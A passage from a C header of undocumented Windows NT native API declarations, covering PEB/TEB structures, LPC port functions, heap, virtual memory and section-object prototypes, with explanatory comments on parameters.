2760 |     PVOID ProcessStarterHelper;
2761 |     PVOID GdiDCAttributeList;
2762 |     PVOID LoaderLock;
2763 | 
2764 |     //
2765 |     // Following fields filled in by MmCreatePeb from system values and/or
2766 |     // image header. These fields have changed since Windows NT 4.0,
2767 |     // so use with caution
2768 |     //
2769 | 
2770 |     ULONG OSMajorVersion;
2771 |     ULONG OSMinorVersion;
2772 |     USHORT OSBuildNumber;
2773 |     USHORT OSCSDVersion;
2774 |     ULONG OSPlatformId;
2775 |     ULONG ImageSubsystem;
2776 |     ULONG ImageSubsystemMajorVersion;
2777 |     ULONG ImageSubsystemMinorVersion;
2778 |     ULONG ImageProcessAffinityMask;
2779 |     ULONG GdiHandleBuffer[GDI_HANDLE_BUFFER_SIZE];
2780 | 
2781 | } PEB, *PPEB;
2782 | 
2783 | 
2784 | //
2785 | // Thread environment block
2786 | //
2787 | 
2788 | typedef struct _TEB
2789 | {
2790 |     NT_TIB NtTib;
2791 |     PVOID  EnvironmentPointer;
2792 |     CLIENT_ID ClientId;
2793 |     PVOID ActiveRpcHandle;
2794 |     PVOID ThreadLocalStoragePointer;
2795 |     PPEB ProcessEnvironmentBlock;
2796 |     ULONG LastErrorValue;
2797 |     ULONG CountOfOwnedCriticalSections;
2798 |     PVOID CsrClientThread;
2799 |     PVOID Win32ThreadInfo;
2800 |     // Incomplete
2801 | 
2802 | } TEB, *PTEB;
2803 | 
2804 | 
2805 | typedef struct _PROCESS_BASIC_INFORMATION
2806 | {
2807 |     NTSTATUS ExitStatus;
2808 |     PPEB PebBaseAddress;
2809 |     ULONG_PTR AffinityMask;
2810 |     KPRIORITY BasePriority;
2811 |     ULONG_PTR UniqueProcessId;
2812 |     ULONG_PTR InheritedFromUniqueProcessId;
2813 | 
2814 | } PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;
2815 | 
2816 | 
2817 | 
2818 | #define NtCurrentProcess() ((HANDLE) -1)
2819 | #define NtCurrentThread()  ((HANDLE) -2)
2820 | 
2821 | NTSYSAPI
2822 | NTSTATUS
2823 | NTAPI
2824 | NtOpenProcess (
2825 |     OUT PHANDLE ProcessHandle,
2826 |     IN ACCESS_MASK DesiredAccess,
2827 |     IN POBJECT_ATTRIBUTES ObjectAttributes,
2828 |     IN PCLIENT_ID ClientId OPTIONAL
2829 |     );
2830 | 
2831 | NTSYSCALLAPI
2832 | 	NTSTATUS
2833 | 	NTAPI
2834 | 	NtSuspendProcess(
2835 | 	IN HANDLE ProcessHandle
2836 | 	);
2837 | 
2838 | NTSYSCALLAPI
2839 | 	NTSTATUS
2840 | 	NTAPI
2841 | 	NtResumeProcess(
2842 | 	IN HANDLE ProcessHandle
2843 | 	);
2844 | 
2845 | NTSYSAPI
2846 | NTSTATUS
2847 | NTAPI
2848 | NtOpenThread (
2849 |     OUT PHANDLE ThreadHandle,
2850 |     IN ACCESS_MASK DesiredAccess,
2851 |     IN POBJECT_ATTRIBUTES ObjectAttributes,
2852 |     IN PCLIENT_ID ClientId OPTIONAL
2853 |     );
2854 | 
2855 | NTSYSAPI
2856 | 	NTSTATUS
2857 | 	NTAPI
2858 | 	NtQueryInformationThread(
2859 | 	IN HANDLE  ThreadHandle,
2860 | 	IN THREADINFOCLASS  ThreadInformationClass,
2861 | 	OUT PVOID  ThreadInformation,
2862 | 	IN ULONG  ThreadInformationLength,
2863 | 	OUT PULONG  ReturnLength  OPTIONAL
2864 | 	);
2865 | 
2866 | NTSYSAPI
2867 | NTSTATUS
2868 | NTAPI
2869 | NtQueryInformationProcess(
2870 |     IN HANDLE ProcessHandle,
2871 |     IN PROCESSINFOCLASS ProcessInformationClass,
2872 |     OUT PVOID ProcessInformation,
2873 |     IN ULONG ProcessInformationLength,
2874 |     OUT PULONG ReturnLength OPTIONAL
2875 |     );
2876 | 
2877 | 
2878 | NTSYSAPI
2879 | NTSTATUS
2880 | NTAPI
2881 | NtSetInformationProcess (
2882 |     IN HANDLE ProcessHandle,
2883 |     IN PROCESSINFOCLASS ProcessInformationClass,
2884 |     IN PVOID ProcessInformation,
2885 |     IN ULONG ProcessInformationLength
2886 |     );
2887 | 
2888 | //------------------------------------------------------------------------------
2889 | // LPC Functions
2890 | 
2891 | #define MAX_LPC_DATA 0x130    // Maximum number of bytes that can be copied through LPC
2892 | 
2893 | // LPC connection types
2894 | typedef enum _LPC_TYPE
2895 | {
2896 |     LPC_NEW_MESSAGE,                    // (0) A new message
2897 |     LPC_REQUEST,                        // (1) A request message
2898 |     LPC_REPLY,                          // (2) A reply to a request message
2899 |     LPC_DATAGRAM,                       // (3)
2900 |     LPC_LOST_REPLY,                     // (4)
2901 |     LPC_PORT_CLOSED,                    // (5) Send when port is deleted
2902 |     LPC_CLIENT_DIED,                    // (6) Messages to thread termination ports
2903 |     LPC_EXCEPTION,                      // (7) Messages to thread exception ports
2904 |     LPC_DEBUG_EVENT,                    // (8) Messages to thread debug port
2905 |     LPC_ERROR_EVENT,                    // (9) Used by NtRaiseHardError
2906 |     LPC_CONNECTION_REQUEST              // (A) Used by NtConnectPort
2907 | 
2908 | } LPC_TYPE, *PLPC_TYPE;
2909 | 
2910 | //
2911 | // Define header for Port Message
2912 | //
2913 | 
2914 | typedef struct _PORT_MESSAGE
2915 | {
2916 |     USHORT DataLength;                  // Length of data following the header (bytes)
2917 |     USHORT TotalLength;                 // Length of data + sizeof(PORT_MESSAGE)
2918 |     USHORT Type;                        // Type of the message (See LPC_TYPE enum)
2919 |     USHORT VirtualRangesOffset;         // Offset of array of virtual address ranges
2920 |     CLIENT_ID ClientId;                 // Client identifier of the message sender
2921 |     ULONG  MessageId;                   // Identifier of the particular message instance
2922 |     union
2923 |     {
2924 |         ULONG  CallbackId;              //
2925 |         ULONG  ClientViewSize;          // Size, in bytes, of section created by the sender
2926 |     };
2927 | 
2928 | } PORT_MESSAGE, *PPORT_MESSAGE;
2929 | 
2930 | //
2931 | // Define structure for initializing shared memory on the caller's side of the port
2932 | //
2933 | 
2934 | typedef struct _PORT_VIEW {
2935 | 
2936 |     ULONG  Length;                      // Size of this structure
2937 |     HANDLE SectionHandle;               // Handle to section object with
2938 |                                         // SECTION_MAP_WRITE and SECTION_MAP_READ
2939 |     ULONG  SectionOffset;               // The offset in the section to map a view for
2940 |                                         // the port data area. The offset must be aligned
2941 |                                         // with the allocation granularity of the system.
2942 |     ULONG  ViewSize;                    // The size of the view (in bytes)
2943 |     PVOID  ViewBase;                    // The base address of the view in the creator
2944 |                                         //
2945 |     PVOID  ViewRemoteBase;              // The base address of the view in the process
2946 |                                         // connected to the port.
2947 | } PORT_VIEW, *PPORT_VIEW;
2948 | 
2949 | //
2950 | // Define structure for shared memory coming from remote side of the port
2951 | //
2952 | 
2953 | typedef struct _REMOTE_PORT_VIEW {
2954 | 
2955 |     ULONG Length;                       // Size of this structure
2956 |     ULONG ViewSize;                     // The size of the view (bytes)
2957 |     PVOID ViewBase;                     // Base address of the view
2958 | 
2959 | } REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;
2960 | 
2961 | /*++
2962 | 
2963 |     NtCreatePort
2964 |     ============
2965 | 
2966 |     Creates a LPC port object. The creator of the LPC port becomes a server
2967 |     of LPC communication
2968 | 
2969 |     PortHandle - Points to a variable that will receive the
2970 |         port object handle if the call is successful.
2971 | 
2972 |     ObjectAttributes - Points to a structure that specifies the object s
2973 |         attributes. OBJ_KERNEL_HANDLE, OBJ_OPENLINK, OBJ_OPENIF, OBJ_EXCLUSIVE,
2974 |         OBJ_PERMANENT, and OBJ_INHERIT are not valid attributes for a port object.
2975 | 
2976 |     MaxConnectionInfoLength - The maximum size, in bytes, of data that can
2977 |         be sent through the port.
2978 | 
2979 |     MaxMessageLength - The maximum size, in bytes, of a message
2980 |         that can be sent through the port.
2981 | 
2982 |     MaxPoolUsage - Specifies the maximum amount of NonPaged pool that can be used for
2983 |         message storage. Zero means default value.
2984 | 
2985 |     ZwCreatePort verifies that (MaxDataSize <= 0x104) and (MaxMessageSize <= 0x148).
2986 | 
2987 | --*/
2988 | 
2989 | NTSYSAPI
2990 | NTSTATUS
2991 | NTAPI
2992 | NtCreatePort(
2993 |     OUT PHANDLE PortHandle,
2994 |     IN  POBJECT_ATTRIBUTES ObjectAttributes,
2995 |     IN  ULONG MaxConnectionInfoLength,
2996 |     IN  ULONG MaxMessageLength,
2997 |     IN  ULONG MaxPoolUsage
2998 |     );
2999 | 
3000 | 
3001 | /*++
3002 | 
3003 |     NtConnectPort
3004 |     =============
3005 | 
3006 |     Creates a port connected to a named port (cliend side).
3007 | 
3008 |     PortHandle - A pointer to a variable that will receive the client
3009 |         communication port object handle value.
3010 | 
3011 |     PortName - Points to a structure that specifies the name
3012 |         of the port to connect to.
3013 | 
3014 |     SecurityQos - Points to a structure that specifies the level
3015 |         of impersonation available to the port listener.
3016 | 
3017 |     ClientView - Optionally points to a structure describing
3018 |         the shared memory region used to send large amounts of data
3019 |         to the listener; if the call is successful, this will be updated.
3020 | 
3021 |     ServerView - Optionally points to a caller-allocated buffer
3022 |         or variable that receives information on the shared memory region
3023 |         used by the listener to send large amounts of data to the
3024 |         caller.
3025 | 
3026 |     MaxMessageLength - Optionally points to a variable that receives the size,
3027 |         in bytes, of the largest message that can be sent through the port.
3028 | 
3029 |     ConnectionInformation - Optionally points to a caller-allocated
3030 |         buffer or variable that specifies connect data to send to the listener,
3031 |         and receives connect data sent by the listener.
3032 | 
3033 |     ConnectionInformationLength - Optionally points to a variable that
3034 |         specifies the size, in bytes, of the connect data to send
3035 |         to the listener, and receives the size of the connect data
3036 |         sent by the listener.
3037 | 
3038 | --*/
3039 | 
3040 | NTSYSAPI
3041 | NTSTATUS
3042 | NTAPI
3043 | NtConnectPort(
3044 |     OUT PHANDLE PortHandle,
3045 |     IN  PUNICODE_STRING PortName,
3046 |     IN  PSECURITY_QUALITY_OF_SERVICE SecurityQos,
3047 |     IN  OUT PPORT_VIEW ClientView OPTIONAL,
3048 |     OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
3049 |     OUT PULONG MaxMessageLength OPTIONAL,
3050 |     IN  OUT PVOID ConnectionInformation OPTIONAL,
3051 |     IN  OUT PULONG ConnectionInformationLength OPTIONAL
3052 |     );
3053 | 
3054 | 
3055 | NTSYSAPI
3056 | NTSTATUS
3057 | NTAPI
3058 | ZwConnectPort(
3059 |     OUT PHANDLE PortHandle,
3060 |     IN  PUNICODE_STRING PortName,
3061 |     IN  PSECURITY_QUALITY_OF_SERVICE SecurityQos,
3062 |     IN  OUT PPORT_VIEW ClientView OPTIONAL,
3063 |     OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
3064 |     OUT PULONG MaxMessageLength OPTIONAL,
3065 |     IN  OUT PVOID ConnectionInformation OPTIONAL,
3066 |     IN  OUT PULONG ConnectionInformationLength OPTIONAL
3067 |     );
3068 | 
3069 | 
3070 | /*++
3071 | 
3072 |     NtListenPort
3073 |     ============
3074 | 
3075 |     Listens on a port for a connection request message on the server side.
3076 | 
3077 |     PortHandle - A handle to a port object. The handle doesn't need
3078 |         to grant any specific access.
3079 | 
3080 |     ConnectionRequest - Points to a caller-allocated buffer
3081 |         or variable that receives the connect message sent to
3082 |         the port.
3083 | 
3084 | --*/
3085 | 
3086 | 
3087 | NTSYSAPI
3088 | NTSTATUS
3089 | NTAPI
3090 | NtListenPort(
3091 |     IN  HANDLE PortHandle,
3092 |     OUT PPORT_MESSAGE RequestMessage
3093 |     );
3094 | 
3095 | /*++
3096 | 
3097 |     NtAcceptConnectPort
3098 |     ===================
3099 | 
3100 |     Accepts or rejects a connection request on the server side.
3101 | 
3102 |     PortHandle - Points to a variable that will receive the port object
3103 |         handle if the call is successful.
3104 | 
3105 |     PortContext - A numeric identifier to be associated with the port.
3106 | 
3107 |     ConnectionRequest - Points to a caller-allocated buffer or variable
3108 |         that identifies the connection request and contains any connect
3109 |         data that should be returned to requestor of the connection
3110 | 
3111 |     AcceptConnection - Specifies whether the connection should
3112 |         be accepted or not
3113 | 
3114 |     ServerView - Optionally points to a structure describing
3115 |         the shared memory region used to send large amounts of data to the
3116 |         requestor; if the call is successful, this will be updated
3117 | 
3118 |     ClientView - Optionally points to a caller-allocated buffer
3119 |         or variable that receives information on the shared memory
3120 |         region used by the requestor to send large amounts of data to the
3121 |         caller
3122 | 
3123 | --*/
3124 | 
3125 | 
3126 | NTSYSAPI
3127 | NTSTATUS
3128 | NTAPI
3129 | NtAcceptConnectPort(
3130 |     OUT PHANDLE PortHandle,
3131 |     IN  PVOID PortContext OPTIONAL,
3132 |     IN  PPORT_MESSAGE ConnectionRequest,
3133 |     IN  BOOLEAN AcceptConnection,
3134 |     IN  OUT PPORT_VIEW ServerView OPTIONAL,
3135 |     OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
3136 |     );
3137 | 
3138 | /*++
3139 | 
3140 |     NtCompleteConnectPort
3141 |     =====================
3142 | 
3143 |     Completes the port connection process on the server side.
3144 | 
3145 |     PortHandle - A handle to a port object. The handle doesn't need
3146 |         to grant any specific access.
3147 | 
3148 | --*/
3149 | 
3150 | 
3151 | NTSYSAPI
3152 | NTSTATUS
3153 | NTAPI
3154 | NtCompleteConnectPort(
3155 |     IN  HANDLE PortHandle
3156 |     );
3157 | 
3158 | 
3159 | NTSYSAPI
3160 | NTSTATUS
3161 | NTAPI
3162 | ZwCompleteConnectPort(
3163 |     IN  HANDLE PortHandle
3164 |     );
3165 | 
3166 | 
3167 | /*++
3168 | 
3169 |     NtRequestPort
3170 |     =============
3171 | 
3172 |     Sends a request message to a port (client side)
3173 | 
3174 |     PortHandle - A handle to a port object. The handle doesn't need
3175 |         to grant any specific access.
3176 | 
3177 |     RequestMessage - Points to a caller-allocated buffer or variable
3178 |         that specifies the request message to send to the port.
3179 | 
3180 | --*/
3181 | 
3182 | NTSYSAPI
3183 | NTSTATUS
3184 | NTAPI
3185 | NtRequestPort (
3186 |     IN  HANDLE PortHandle,
3187 |     IN  PPORT_MESSAGE RequestMessage
3188 |     );
3189 | 
3190 | /*++
3191 | 
3192 |     NtRequestWaitReplyPort
3193 |     ======================
3194 | 
3195 |     Sends a request message to a port and waits for a reply (client side)
3196 | 
3197 |     PortHandle - A handle to a port object. The handle doesn't need
3198 |         to grant any specific access.
3199 | 
3200 |     RequestMessage - Points to a caller-allocated buffer or variable
3201 |         that specifies the request message to send to the port.
3202 | 
3203 |     ReplyMessage - Points to a caller-allocated buffer or variable
3204 |         that receives the reply message sent to the port.
3205 | 
3206 | --*/
3207 | 
3208 | NTSYSAPI
3209 | NTSTATUS
3210 | NTAPI
3211 | NtRequestWaitReplyPort(
3212 |     IN  HANDLE PortHandle,
3213 |     IN  PPORT_MESSAGE RequestMessage,
3214 |     OUT PPORT_MESSAGE ReplyMessage
3215 |     );
3216 | 
3217 | 
3218 | NTSYSAPI
3219 | NTSTATUS
3220 | NTAPI
3221 | ZwRequestWaitReplyPort(
3222 |     IN  HANDLE PortHandle,
3223 |     IN  PPORT_MESSAGE RequestMessage,
3224 |     OUT PPORT_MESSAGE ReplyMessage
3225 |     );
3226 | 
3227 | 
3228 | /*++
3229 | 
3230 |     NtReplyPort
3231 |     ===========
3232 | 
3233 |     Sends a reply message to a port (Server side)
3234 | 
3235 |     PortHandle - A handle to a port object. The handle doesn't need
3236 |         to grant any specific access.
3237 | 
3238 |     ReplyMessage - Points to a caller-allocated buffer or variable
3239 |         that specifies the reply message to send to the port.
3240 | 
3241 | --*/
3242 | 
3243 | 
3244 | NTSYSAPI
3245 | NTSTATUS
3246 | NTAPI
3247 | NtReplyPort(
3248 |     IN  HANDLE PortHandle,
3249 |     IN  PPORT_MESSAGE ReplyMessage
3250 |     );
3251 | 
3252 | /*++
3253 | 
3254 |     NtReplyWaitReplyPort
3255 |     ====================
3256 | 
3257 |     Sends a reply message to a port and waits for a reply message
3258 | 
3259 |     PortHandle - A handle to a port object. The handle doesn't need
3260 |         to grant any specific access.
3261 | 
3262 |     ReplyMessage - Points to a caller-allocated buffer or variable
3263 |         that specifies the reply message to send to the port.
3264 | 
3265 | --*/
3266 | 
3267 | NTSYSAPI
3268 | NTSTATUS
3269 | NTAPI
3270 | NtReplyWaitReplyPort(
3271 |     IN  HANDLE PortHandle,
3272 |     IN  OUT PPORT_MESSAGE ReplyMessage
3273 |     );
3274 | 
3275 | 
3276 | /*++
3277 | 
3278 |     NtReplyWaitReceivePort
3279 |     ======================
3280 | 
3281 |     Optionally sends a reply message to a port and waits for a
3282 |     message
3283 | 
3284 |     PortHandle - A handle to a port object. The handle doesn't need
3285 |         to grant any specific access.
3286 | 
3287 |     PortContext - Optionally points to a variable that receives
3288 |         a numeric identifier associated with the port.
3289 | 
3290 |     ReplyMessage - Optionally points to a caller-allocated buffer
3291 |         or variable that specifies the reply message to send to the port.
3292 | 
3293 |     ReceiveMessage - Points to a caller-allocated buffer or variable
3294 |         that receives the message sent to the port.
3295 | 
3296 | --*/
3297 | 
3298 | NTSYSAPI
3299 | NTSTATUS
3300 | NTAPI
3301 | NtReplyWaitReceivePort(
3302 |     IN  HANDLE PortHandle,
3303 |     OUT PVOID *PortContext OPTIONAL,
3304 |     IN  PPORT_MESSAGE ReplyMessage OPTIONAL,
3305 |     OUT PPORT_MESSAGE ReceiveMessage
3306 |     );
3307 | 
3308 | //-----------------------------------------------------------------------------
3309 | // Heap functions
3310 | 
3311 | #define HEAP_NO_SERIALIZE               0x00000001
3312 | #define HEAP_GROWABLE                   0x00000002
3313 | #define HEAP_GENERATE_EXCEPTIONS        0x00000004
3314 | #define HEAP_ZERO_MEMORY                0x00000008
3315 | #define HEAP_REALLOC_IN_PLACE_ONLY      0x00000010
3316 | #define HEAP_TAIL_CHECKING_ENABLED      0x00000020
3317 | #define HEAP_FREE_CHECKING_ENABLED      0x00000040
3318 | #define HEAP_DISABLE_COALESCE_ON_FREE   0x00000080
3319 | #define HEAP_CREATE_ALIGN_16            0x00010000
3320 | #define HEAP_CREATE_ENABLE_TRACING      0x00020000
3321 | #define HEAP_MAXIMUM_TAG                0x0FFF
3322 | #define HEAP_PSEUDO_TAG_FLAG            0x8000
3323 | 
3324 | //
3325 | // Data structure for heap definition. This includes various
3326 | // sizing parameters and callback routines, which, if left NULL,
3327 | // result in default behavior
3328 | //
3329 | 
3330 | typedef struct RTL_HEAP_PARAMETERS {
3331 |     ULONG Length;        //sizeof(RTL_HEAP_PARAMETERS)
3332 |     ULONG SegmentReserve;
3333 |     ULONG SegmentCommit;
3334 |     ULONG DeCommitFreeBlockThreshold;
3335 |     ULONG DeCommitTotalFreeThreshold;
3336 |     ULONG MaximumAllocationSize;
3337 |     ULONG VirtualMemoryThreshold;
3338 |     ULONG InitialCommit;
3339 |     ULONG InitialReserve;
3340 |     PVOID CommitRoutine;
3341 |     ULONG Reserved;
3342 | } RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;
3343 | 
3344 | 
3345 | #define RtlProcessHeap() (HANDLE)(NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap)
3346 | 
3347 | 
3348 | NTSYSAPI
3349 | HANDLE
3350 | NTAPI
3351 | RtlCreateHeap (
3352 |     IN ULONG Flags,
3353 |     IN PVOID BaseAddress OPTIONAL,
3354 |     IN ULONG SizeToReserve,
3355 |     IN ULONG SizeToCommit,
3356 |     IN BOOLEAN Lock OPTIONAL,
3357 |     IN PRTL_HEAP_PARAMETERS Definition OPTIONAL
3358 |     );
3359 | 
3360 | 
3361 | NTSYSAPI
3362 | ULONG
3363 | NTAPI
3364 | RtlDestroyHeap (
3365 |     IN HANDLE HeapHandle
3366 |     );
3367 | 
3368 | 
3369 | NTSYSAPI
3370 | PVOID
3371 | NTAPI
3372 | RtlAllocateHeap (
3373 |     IN HANDLE HeapHandle,
3374 |     IN ULONG Flags,
3375 |     IN ULONG Size
3376 |     );
3377 | 
3378 | 
3379 | NTSYSAPI
3380 | BOOLEAN
3381 | NTAPI
3382 | RtlFreeHeap (
3383 |     IN HANDLE HeapHandle,
3384 |     IN ULONG Flags,
3385 |     IN PVOID Address
3386 |     );
3387 | 
3388 | 
3389 | NTSYSAPI
3390 | ULONG
3391 | NTAPI
3392 | RtlCompactHeap (
3393 |     IN HANDLE HeapHandle,
3394 |     IN ULONG Flags
3395 |     );
3396 | 
3397 | 
3398 | NTSYSAPI
3399 | BOOLEAN
3400 | NTAPI
3401 | RtlLockHeap (
3402 |     IN HANDLE HeapHandle
3403 |     );
3404 | 
3405 | 
3406 | NTSYSAPI
3407 | BOOLEAN
3408 | NTAPI
3409 | RtlUnlockHeap (
3410 |     IN HANDLE HeapHandle
3411 |     );
3412 | 
3413 | 
3414 | NTSYSAPI
3415 | PVOID
3416 | NTAPI
3417 | RtlReAllocateHeap (
3418 |     IN HANDLE HeapHandle,
3419 |     IN ULONG Flags,
3420 |     IN PVOID Address,
3421 |     IN ULONG Size
3422 |     );
3423 | 
3424 | 
3425 | NTSYSAPI
3426 | ULONG
3427 | NTAPI
3428 | RtlSizeHeap (
3429 |     IN HANDLE HeapHandle,
3430 |     IN ULONG Flags,
3431 |     IN PVOID Address
3432 |     );
3433 | 
3434 | 
3435 | NTSYSAPI
3436 | BOOLEAN
3437 | NTAPI
3438 | RtlValidateHeap (
3439 |     IN HANDLE HeapHandle,
3440 |     IN ULONG Flags,
3441 |     IN PVOID Address OPTIONAL
3442 |     );
3443 | 
3444 | 
3445 | //-----------------------------------------------------------------------------
3446 | // Virtual memory functions
3447 | 
3448 | NTSYSAPI
3449 | NTSTATUS
3450 | NTAPI
3451 | NtAllocateVirtualMemory (
3452 |     IN HANDLE ProcessHandle,
3453 |     IN OUT PVOID *BaseAddress,
3454 |     IN ULONG ZeroBits,
3455 |     IN OUT PULONG RegionSize,
3456 |     IN ULONG AllocationType,
3457 |     IN ULONG Protect
3458 |     );
3459 | 
3460 | 
3461 | NTSYSAPI
3462 | NTSTATUS
3463 | NTAPI
3464 | ZwAllocateVirtualMemory (
3465 |     IN HANDLE ProcessHandle,
3466 |     IN OUT PVOID *BaseAddress,
3467 |     IN ULONG ZeroBits,
3468 |     IN OUT PULONG RegionSize,
3469 |     IN ULONG AllocationType,
3470 |     IN ULONG Protect
3471 |     );
3472 | 
3473 | 
3474 | NTSYSAPI
3475 | NTSTATUS
3476 | NTAPI
3477 | NtFreeVirtualMemory (
3478 |     IN HANDLE ProcessHandle,
3479 |     IN OUT PVOID *BaseAddress,
3480 |     IN OUT PULONG RegionSize,
3481 |     IN ULONG FreeType
3482 |     );
3483 | 
3484 | 
3485 | NTSYSAPI
3486 | NTSTATUS
3487 | NTAPI
3488 | ZwFreeVirtualMemory (
3489 |     IN HANDLE ProcessHandle,
3490 |     IN OUT PVOID *BaseAddress,
3491 |     IN OUT PULONG RegionSize,
3492 |     IN ULONG FreeType
3493 |     );
3494 | 
3495 | 
3496 | NTSYSAPI
3497 | NTSTATUS
3498 | NTAPI
3499 | NtReadVirtualMemory(
3500 |     IN HANDLE ProcessHandle,
3501 |     IN PVOID BaseAddress,
3502 |     OUT PVOID Buffer,
3503 |     IN ULONG NumberOfBytesToRead,
3504 |     OUT PULONG NumberOfBytesRead OPTIONAL
3505 |     );
3506 | 
3507 | 
3508 | 
3509 | 
3510 | 
3511 | 
3512 | //-----------------------------------------------------------------------------
3513 | // Section functions
3514 | 
3515 | typedef enum _SECTION_INHERIT
3516 | {
3517 |     ViewShare = 1,
3518 |     ViewUnmap = 2
3519 | 
3520 | } SECTION_INHERIT;
3521 | 
3522 | 
3523 | typedef enum _SECTION_INFORMATION_CLASS
3524 | {
3525 |     SectionBasicInformation,
3526 |     SectionImageInformation
3527 | 
3528 | } SECTION_INFORMATION_CLASS, *PSECTION_INFORMATION_CLASS;
3529 | 
3530 | 
3531 | /*++
3532 | 
3533 |     NtCreateSection
3534 |     ===============
3535 | 
3536 |     Creates a section object.
3537 | 
3538 |     SectionHandle - Points to a variable that will receive the section
3539 |         object handle if the call is successful.
3540 | 
3541 |     DesiredAccess - Specifies the type of access that the caller requires
3542 |         to the section object. This parameter can be zero, or any combination
3543 |         of the following flags:
3544 | 
3545 |         SECTION_QUERY       - Query access
3546 |         SECTION_MAP_WRITE   - Can be written when mapped
3547 |         SECTION_MAP_READ    - Can be read when mapped
3548 |         SECTION_MAP_EXECUTE - Can be executed when mapped
3549 |         SECTION_EXTEND_SIZE - Extend access
3550 |         SECTION_ALL_ACCESS  - All of the preceding +
3551 |                               STANDARD_RIGHTS_REQUIRED
3552 | 
3553 |     ObjectAttributes - Points to a structure that specifies the object s attributes.
3554 |         OBJ_OPENLINK is not a valid attribute for a section object.
3555 | 
3556 |     MaximumSize - Optionally points to a variable that specifies the size,
3557 |         in bytes, of the section. If FileHandle is zero, the size must be
3558 |         specified; otherwise, it can be defaulted from the size of the file
3559 |         referred to by FileHandle.
3560 | 
3561 |     SectionPageProtection - The protection desired for the pages
3562 |         of the section when the section is mapped. This parameter can take
3563 |         one of the following values:
3564 | 
3565 |         PAGE_READONLY
3566 |         PAGE_READWRITE
3567 |         PAGE_WRITECOPY
3568 |         PAGE_EXECUTE
3569 |         PAGE_EXECUTE_READ
3570 |         PAGE_EXECUTE_READWRITE
3571 |         PAGE_EXECUTE_WRITECOPY
3572 | 
3573 |     AllocationAttributes - The attributes for the section. This parameter must
3574 |         be a combination of the following values:
3575 | 
3576 |         SEC_BASED     0x00200000    // Map section at same address in each process
3577 |         SEC_NO_CHANGE 0x00400000    // Disable changes to protection of pages
3578 |         SEC_IMAGE     0x01000000    // Map section as an image
3579 |         SEC_VLM       0x02000000    // Map section in VLM region
3580 |         SEC_RESERVE   0x04000000    // Reserve without allocating pagefile storage
3581 |         SEC_COMMIT    0x08000000    // Commit pages; the default behavior
3582 |         SEC_NOCACHE   0x10000000    // Mark pages as non-cacheable
3583 | 
3584 |     FileHandle - Identifies the file from which to create the section object.
3585 |         The file must be opened with an access mode compatible with the protection
3586 |         flags specified by the Protect parameter. If FileHandle is zero,
3587 |         the function creates a section object of the specified size backed
3588 |         by the paging file rather than by a named file in the file system.
3589 | 
3590 | --*/
3591 | 
3592 | 
3593 | NTSYSAPI
3594 | NTSTATUS
3595 | NTAPI
3596 | NtCreateSection(
3597 |     OUT PHANDLE SectionHandle,
3598 |     IN  ACCESS_MASK DesiredAccess,
3599 |     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
3600 |     IN  PLARGE_INTEGER MaximumSize OPTIONAL,
3601 |     IN  ULONG SectionPageProtection,
3602 |     IN  ULONG AllocationAttributes,
3603 |     IN  HANDLE FileHandle OPTIONAL
3604 |     );
3605 | 
3606 | 
3607 | NTSYSAPI
3608 | NTSTATUS
3609 | NTAPI
3610 | ZwCreateSection(
3611 |     OUT PHANDLE SectionHandle,
3612 |     IN  ACCESS_MASK DesiredAccess,
3613 |     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
3614 |     IN  PLARGE_INTEGER MaximumSize OPTIONAL,
3615 |     IN  ULONG SectionPageProtection,
3616 |     IN  ULONG AllocationAttributes,
3617 |     IN  HANDLE FileHandle OPTIONAL
3618 |     );
3619 | 
3620 | 
3621 | NTSYSAPI
3622 | NTSTATUS
3623 | NTAPI
3624 | NtOpenSection (
3625 |     OUT PHANDLE SectionHandle,
3626 |     IN ACCESS_MASK DesiredAccess,
3627 |     IN POBJECT_ATTRIBUTES ObjectAttributes
3628 |     );
3629 | 
3630 | 
3631 | NTSYSAPI
3632 | NTSTATUS
3633 | NTAPI
3634 | ZwOpenSection (
3635 |     OUT PHANDLE SectionHandle,
3636 |     IN ACCESS_MASK DesiredAccess,
3637 |     IN POBJECT_ATTRIBUTES ObjectAttributes
3638 |     );
3639 | 
3640 | 
3641 | NTSYSAPI
3642 | NTSTATUS
3643 | NTAPI
3644 | NtMapViewOfSection (
3645 |     IN HANDLE SectionHandle,
3646 |     IN HANDLE ProcessHandle,
3647 |     IN OUT PVOID *BaseAddress,
3648 |     IN ULONG ZeroBits,
3649 |     IN ULONG CommitSize,
3650 |     IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
3651 |     IN OUT PULONG ViewSize,
3652 |     IN SECTION_INHERIT InheritDisposition,
3653 |     IN ULONG AllocationType,
3654 |     IN ULONG Protect
3655 |     );
3656 | 
3657 | 
3658 | NTSYSAPI
3659 | NTSTATUS
3660 | NTAPI
3661 | ZwMapViewOfSection (
3662 |     IN HANDLE SectionHandle,
3663 |     IN HANDLE ProcessHandle,
3664 |     IN OUT PVOID *BaseAddress,
3665 |     IN ULONG ZeroBits,
3666 |     IN ULONG CommitSize,
3667 |     IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
3668 |     IN OUT PULONG ViewSize,
3669 |     IN SECTION_INHERIT InheritDisposition,
3670 |     IN ULONG AllocationType,
3671 |     IN ULONG Protect
3672 |     );
3673 | 
3674 | 
3675 | NTSYSAPI
3676 | NTSTATUS
3677 | NTAPI
3678 | NtUnmapViewOfSection (
3679 |     IN HANDLE ProcessHandle,
3680 |     IN PVOID BaseAddress
3681 |     );
3682 | 
3683 | 
3684 | NTSYSAPI
3685 | NTSTATUS
3686 | NTAPI
3687 | ZwUnmapViewOfSection (
3688 |     IN HANDLE ProcessHandle,
3689 |     IN PVOID BaseAddress
3690 |     );
3691 | 
3692 | 
3693 | NTSYSAPI
3694 | NTSTATUS
3695 | NTAPI
3696 | NtExtendSection (
3697 |     IN HANDLE SectionHandle,
3698 |     IN OUT PLARGE_INTEGER SectionSize
3699 |     );
3700 | 
3701 | 
3702 | NTSYSAPI
3703 | NTSTATUS
3704 | NTAPI
3705 | ZwExtendSection (
3706 |     IN HANDLE SectionHandle,
3707 |     IN OUT PLARGE_INTEGER SectionSize
3708 |     );
3709 | 
